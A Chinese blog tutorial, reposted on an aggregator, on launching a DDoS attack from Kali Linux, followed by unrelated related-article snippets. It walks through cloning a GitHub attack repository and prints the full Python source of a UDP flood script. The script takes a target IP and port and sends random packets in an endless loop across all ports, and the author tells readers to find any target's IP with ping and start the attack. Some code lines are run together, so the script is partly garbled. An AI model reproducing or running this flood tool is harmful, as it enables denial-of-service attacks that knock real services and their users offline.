如何使用kali来进行一次ddos攻击

 

7f99a7fbd1cf4cdbbe15b00ad96cb6d0.jpg

本文章用于记录自己的学习路线,不用于其他任何途径! ! !

哈喽啊!又是好久不见,本博主在之前发过一个ddos攻击的介绍。

emm…虽然那篇文章也提到了ddos攻击的方式,但太过于简陋,好像也没有什么用,so,这次给大家带来使用kali进行一次ddos攻击测试

一、安装虚拟机,您可以参考我之前发布的文章

帅气怨言:VMware虚拟机的安装教程57 赞同 · 6 评论文章

二、安装kali系统

如果您已经安装完成,请直接转到第三条 在kali的官网,您可以下载kali的vm虚拟机文件(可以省去安装系统的时间)

33448f2f36184ec3a0ce9eba9d6af91b.webp

 

095c170e9eaf4ef69e0ea03d9606d981.webp

链接:https://www.kali.org/get-kali/#kali-platforms

8f9f3569783d4442816f47bcc03ce65d.webp

下载完成,使用vm虚拟机打开并运行,期间您不需要做任何操作直到出现输入用户名和密码时,kali默认的用户名和密码都是kali,输入后进入系统,至此您的kali系统已经安装完成啦

三、发起一次ddos攻击

打开命令提示符,下载DDos-Attack python脚本

git clone https://github.com/Elsa-zlt/DDos-Attack 

fe4462c2c99a44aeaf400d756d14982a.webp

下载好之后,cd到DDos-Attack文件夹下

cd DDos-Attack 

11078171a0504086851ea546c5d73c6e.webp

修改(设置)对ddos-attack.py文件执行的权限

 chmod +x ddos-attack.py 

839cff6871bc493783a4d9b793999521.jpg

您的kali大部分的python是python3,而其python脚本是python2,所以您需要对ddos-attack.py文件进行一些简单的修改(对所以的print语句加上括号),您也可以直接复制以下源码

import sys
import os
import time
import socket
import random
#Code Time
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############os.system("clear")
os.system("figlet DDos Attack")
print
print ("Author   : HA-MRX")
print ("You Tube : https://www.youtube.com/channel/UCCgy7i_A5yhAEdY86rPOinA")
print ("github   : https://github.com/Ha3MrX")
print ("Facebook : https://www.facebook.com/muhamad.jabar222")
print
ip = input("IP Target : ")
port = input("Port       : ")
port = int(port)os.system("clear")
os.system("figlet Attack Starting")
print ("[                    ] 0% ")
time.sleep(5)
print ("[=====               ] 25%")
time.sleep(5)
print ("[==========          ] 50%")
time.sleep(5)
print ("[===============     ] 75%")
time.sleep(5)
print ("[====================] 100%")
time.sleep(3)
sent = 0
while True:sock.sendto(bytes, (ip,port))sent = sent + 1port = port + 1print ("Sent %s packet to %s throught port:%s"%(sent,ip,port))if port == 65534:port = 1

ce1c4b0efece47038271927445f93046.webp

执行ddos-attack.py程序(如果您的python是2版本的,就把3去掉)

 Python3 ddos-attack.py

72e2d2e6edb74a7f8ddf69ebe97eb57a.webp

出现这个界面(如果出现这个界面说明那个ddos-attack.py程序没有太大的问题了)

c5fc56db14c646b6bc64a41fb9887fcc.webp

 

e04672f047654a689c2470832fc5678d.webp

 

a5580d639ac9450aa3adb08858d93d20.webp

第一个是填写攻击目标的ip地址,如果您不知道目标的ip地址,可以使用ping命令得到目标的ip 第二个是填写端口(其实您可以随便输) 输入完成后,敲击回车,一次ddos攻击便开始了

您可以使用Ctrl+C去退出

记得给我点个赞和关注哦

推荐阅读

基于Kali的一次DDos攻击实践

萌褚

DDoS攻击服务到底需要多少费用?哪些因素决定着其最终成本?

嘶吼Ro... · 发表于嘶吼RoarTalk

简单易懂使用DDOS攻击(教程)

DDos攻击

云安全课堂:DDoS攻击类型及DDoS防御方案

天猫精灵

v2-c32835b65f512b237f7711c4978f77dc_720w.jpg?source=172ae18b

 

 

 

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/225074.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Docker实用篇

文章目录 Docker实用篇0.学习目标1.初识Docker1.1.什么是Docker1.1.1.应用部署的环境问题1.1.2.Docker解决依赖兼容问题1.1.3.Docker解决操作系统环境差异1.1.4.小结 1.2.Docker和虚拟机的区别1.3.Docker架构1.3.1.镜像和容器1.3.2.DockerHub1.3.3.Docker架构1.3.4.小结 1.4.安…

mac电脑系统性能检测:Geekbench 6最新 for mac

Geekbench 6是一款跨平台的性能测试软件,旨在全面衡量电脑在不同任务和应用程序中的性能。它适用于Windows、macOS、Linux等操作系统,以及移动设备如Android和iOS。 Geekbench 6主要特点包括: 全面覆盖各种性能测试领域,包括CPU…

构建外卖系统:从技术到实战

在当今高度数字化的社会中,外卖系统的开发变得愈发重要。本文将从技术角度出发,带领读者一步步构建一个基础的外卖系统,并涵盖关键技术和实际代码。 1. 技术选型 1.1 后端开发 选择Node.js和Express框架进行后端开发,搭建一个灵…

ModuleNotFoundError: No module named ‘tensorflow‘

直接运行pip install tensorflow安装成功之后,发现版本是tensorflow2.15.0 python的版本是3.9版本 导入包:import tensorflow 打包xxx.exe,调用之后提示错误 ModuleNotFoundError: No module named tensorflow 最后发现特定的python的版本对应特定的t…

ioDraw AI:思维导图、流程图、序列图、类图、饼图,一应俱全

前言 在信息爆炸的时代,我们每天接收着大量的信息,如何高效地整理和呈现这些信息成为了一项重要的挑战。思维导图作为一种可视化思维工具,能够帮助我们快速构建和整理复杂的信息结构,便于我们理解和记忆。ioDraw AI绘图工具正是基…

【集合】Vector与CopyOnWriteArrayList

前言: 此篇博客着重于:在多线程并发执行读、写操作的场景下,Vector集合、CopyOnWriteArrayList集合是否能保证线程安全?它们是通过什么方式保证线程安全的? Vector: (1)add(E e)方法…

Android笔记(二十一):Room组件实现Android应用的持久化处理

一、Room组件概述 Room是Android JetPack架构组件之一,是一个持久处理的库。Room提供了在SQLite数据库上提供抽象层,使之实现数据访问。 (1)实体类(Entity):映射并封装了数据库对应的数据表中…

【力扣】199.二叉树的右视图

看到这个题目的一瞬间,我想递归,必须用递归。最近被递归折磨的有点狠,但是我感觉我快要打败它了,就是现在稍稍有点处于劣势。不过没关系,来日方长不是。 法一:递归 题解: 之前想的就是先递归&…

漏洞复现-泛微OA xmlrpcServlet接口任意文件读取漏洞(附漏洞检测脚本)

免责声明 文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的…

Vue 封装echarts柱状图(Bar)组件

目的&#xff1a;减少重复代码&#xff0c;便于维护 显示效果 组件代码 <template><div class"ldw-data-content-box"><div class"ldw-chilren-box"><div class"title" v-if"title">{{ title }}</div>…

聊聊CLI:一个比NPS更全面、客观的体验指标

说起NPS&#xff08;Net Promoter Score&#xff0c;净推荐值&#xff09;大家一定不会感到陌生&#xff0c;它被誉为客户体验管理&#xff08;CEM&#xff09;领域的黄金指标&#xff0c;以“衡量客户忠诚度”而受到大家的认可和追捧。 然而&#xff0c;随着时间的推移和各行业…

Day72力扣打卡

打卡记录 参加考试的最大学生数&#xff08;压缩状态DP&#xff09; 链接 class Solution:def maxStudents(self, seats: List[List[str]]) -> int:m, n len(seats), len(seats[0])# a[i] 是第 i 排可用椅子的下标集合a [sum((c .) << j for j, c in enumerate(s…

C++学习实践(一)高频面试问题总结(附详细答案)

文章目录 一、基础常见面试题1、数组和链表区别2、深拷贝和浅拷贝相关问题的区别3、a和a区别4、c内存模型5、四种强制转换和应用场景 二、指针相关1、指针和引用的区别2、函数指针和指针函数3、传指针、引用和值4、常量指针和指针常量5、野指针6、智能指针的用法 三、关键字作用…

基于5G智能网关的智慧塔吊监测方案

塔吊是建筑施工中必不可少的设施&#xff0c;由于塔吊工作重心高、起重载荷大、人工视距/视角受限等因素&#xff0c;也使得塔吊在工作过程中着较多的危险因素。对此&#xff0c;可以部署基于工业5G智能网关搭建智慧塔吊安全监测系统&#xff0c;实现对塔吊运行的全局精细监测感…

web3风险投资公司之Electric Capital

文章目录 什么是 Electric CapitalElectric团队 Electric Capital 开发者报告参考 什么是 Electric Capital 官网&#xff1a;https://www.electriccapital.com/ 官方github&#xff1a;https://github.com/electric-capital Electric Capital 是一家投资于加密货币、区块链企…

这一次,我准备了 20节 PyTorch 中文课程

对于刚接触深度学习的小白来说&#xff0c;PyTorch 是必会的框架。 只是&#xff0c;很多小伙伴还没来得及开启学习之路&#xff0c;一个最重要的问题就摆在了面前&#xff1a; PyTorch&#xff0c;该怎么学呢&#xff1f; 很多同学会自己在网上找资料&#xff0c;不仅耗费时间…

NET中使用SQLSugar操作sqlserver数据库

目录 一、SqlSugar是什么&#xff1f; 二、迁移和建表 1.建立实体 2.创建上下文类 3.在Program中添加SqlSugar服务 4.在控制器中注入上下文类 三、简单实现CURD功能 总结 一、SqlSugar是什么&#xff1f; SqlSugar是一款老牌 .NET 开源ORM框架。 主要特点&#xff1a…

智能优化算法应用:基于指数分布算法3D无线传感器网络(WSN)覆盖优化 - 附代码

智能优化算法应用&#xff1a;基于指数分布算法3D无线传感器网络(WSN)覆盖优化 - 附代码 文章目录 智能优化算法应用&#xff1a;基于指数分布算法3D无线传感器网络(WSN)覆盖优化 - 附代码1.无线传感网络节点模型2.覆盖数学模型及分析3.指数分布算法4.实验参数设定5.算法结果6.…

二叉树进阶题目(超详解)

文章目录 前言根据二叉树创建字符串题目分析写代码 二叉树的层序遍历题目分析 写代码二叉树的层序遍历II题目分析写代码 二叉树的最近公共祖先题目分析写代码时间复杂度 优化思路优化的代码 二叉搜索树与双向链表题目分析写代码 从前序与中序遍历序列构造二叉树题目分析写代码从…

5G边缘计算:解密边缘计算的魔力

引言 你是否曾想过&#xff0c;网络可以更贴心、更智能地为我们提供服务&#xff1f;5G边缘计算就像是网络的小助手&#xff0c;时刻待命在你身边&#xff0c;让数字生活变得更加便捷。 什么是5G边缘计算&#xff1f; 想象一下&#xff0c;边缘计算就像是在离你最近的一层“云…